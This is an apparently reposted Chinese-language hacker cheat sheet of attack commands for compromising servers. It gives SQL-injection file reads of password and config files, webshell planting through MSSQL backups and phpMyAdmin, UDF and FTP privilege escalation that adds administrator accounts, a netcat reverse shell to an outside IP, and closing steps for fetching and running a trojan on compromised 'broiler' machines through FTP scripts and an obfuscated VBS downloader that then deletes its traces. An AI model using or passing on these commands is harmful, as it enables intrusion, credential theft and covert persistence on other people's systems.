load_file()读取文件
—————————————————————————————————
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\my.ini //MYSQL配置文件
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件

等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,

c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码

————————————————————————————————————————————————
mssql差异备份webshell


1.备份数据
backup database 库名 to disk = 'c:\windows\char.bak';--

2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [p_w_picpath]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
backup database 库名 to disk='目标位置\char.asp' WITH DIFFERENTIAL,FORMAT;--
—————————————————————————————————————————————————
phpmyadmin插马

create table a (hack text not null);
insert into a (hack) values ('<?php system($_REQUEST[cmd]);?>');
select hack from a into outfile 'D:/php/www/hack.php';
drop table a;

phpmyadmin/libraries/select_lang.lib.php

http://www.hashcrack.com/index.php

—————————————————————————————————————————————————
mysql提权
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user 99990110 17216329 /add');
select cmdshell('net localgroup administrators 99990110 /add');
drop function cmdshell;

—————————————————————————————————————————————————
serv-u修改权限配置
User9=Kindle|1|0


[USER=Kindle|1]
Password=mg5D3A393510FB2F0C04FAA8211509296F 密码:17126329
HomeDir=c:\
RelPaths=1
PasswordLastChange=1239006396
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP


—————————————————————————————————————————————————
ftp提权
quote site exec net.exe user Kindle$ 17216329 /add

quote site exec net.exe localgroup administrators Kindle$ /add

regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"

导入注册表是/s

—————————————————————————————————————————————————
mysql爆表注射
SCHEMA_NAME  information_schema.SCHEMATA

TABLE_NAME   information_schema.TABLES where TABLE_SCHEMA=...

COLUMN_NAME  information_schema.COLUMNS where TABLE_NAME=...

——————————————————————————————————————————————————
cookie注射语句
javascript:alert(document.cookie="id="+escape("406 and 1=1"));


——————————————————————————————————————————————————
系统网马后门
copy 1.jpg \\.\c:\com1.asp

nc.exe -vv 203.171.230.200 111 -e C:\Downloads\cmd.exe

dir /b /d /s *.exe>c:\1.txt

123';exec master..xp_cmdshell'net user 213 123 /add';--

javascript:lbtnUpload.click();

——————————————————————————————————————————————————
命令行下载、运行***
下文说一下搞定了肉鸡,如何保持长久上线,防止动态ip或者域名变化导致找不到肉鸡。

  这需要种植***,且这个***要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。

  如何下载***并种植到肉鸡上面的问题,其实网上也有零散的,我这儿算是整理,同时加上自己的体会。大家还是多实践,多搞搞肉鸡(最好练习命令行,3389登陆上去一对记录,如被追踪很危险的。其实我更相信,图形界面下能操作的,命令行都能操作正如windows下能搞的,linux下都能做到)这儿命令行可以是ms sql1433得到的xp_cmdshell等。

  ***下载无非是ftp跟http的网页下载两种方式,这儿分别介绍:

  1.ftp下载

  这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置***的ftp服务。

  显然要解决输入帐号密码的问题,同时要制定命令让远程的ftp.exe执行,从而下载文件。还好,这些都可以通过命令来解决。

  假设***文件在服务器ftpxx.3322.org下,帐号为ftpxx,密码为3322,文件为mm.exe。

  通过命令行

  ===========================

  echo ftpxxx>ftp.txt

  echo 3322>>ftp.txt

  echo get mm.exe>>ftp.txt

  echo bye>>ftp.txt

  ftp -s:ftp.txt ftpxx.3322.org

  ===========================

  则根据前一篇文章的&用法,也可以用一句命令完成:

  echo ftpxxx>ftp.txt & echo 3322>>ftp.txt & echo get mm.exe>>ftp.txt & echo bye>>ftp.txt & ftp -s:ftp.txt ftpxx.3322.org

  这样就下载成功了。

  下一步是执行***并删除记录:

  也就是一句话(三个语句):

  mm.exe & del ftp.txt & del mm.exe

  2.html下载

  这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置***的http服务器。

  假设***地址为:http://ftpxx.3322.org/mm.exe mm.exe

  通过命令行(无需任何修改,我已做免杀,除非被杀了,可以修改脚本)

==========================
  @echo with wscript:if .arguments.count^<2-0+0-0+0 then .quit:end if > thisis.vbs
  @echo set aso=.createobject("adodb.stream"):set thisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp") >> thisis.vbs
  @echo thisisweb.open "g"+"e"+"t",.arguments(0),0:thisisweb.send:if thisisweb.status^>200 then .echo "E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>> thisis.vbs
  @echo aso.type=1-0+0-0+0:aso.open:aso.write thisisweb.responsebody:aso.savetofile .arguments(1-0+0-0+0),2-0+0-0+0:end with >> thisis.vbs
  Type thisis.vbs
  ========================



  下一步是执行***并删除记录:

  也就是一句话(三个语句):

  cscript thisis.vbs http://ftpxx.3322.org/mm.exe mm.exe & del thisis.vbs & del mm.exe

  或者简单的方法是(会弹出网页!):

  START its:http://ftpxx.3322.org/mm.exe

  下载后,

  DIR /A /S "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\*.EXE"

  列出路径后,执行。

       这儿帐号Default User也可能是当前用户

本篇文章来源于 ***基地-全球最大的中文***站 原文链接:http://www.hackbase.com/tech/2009-09-30/56591.html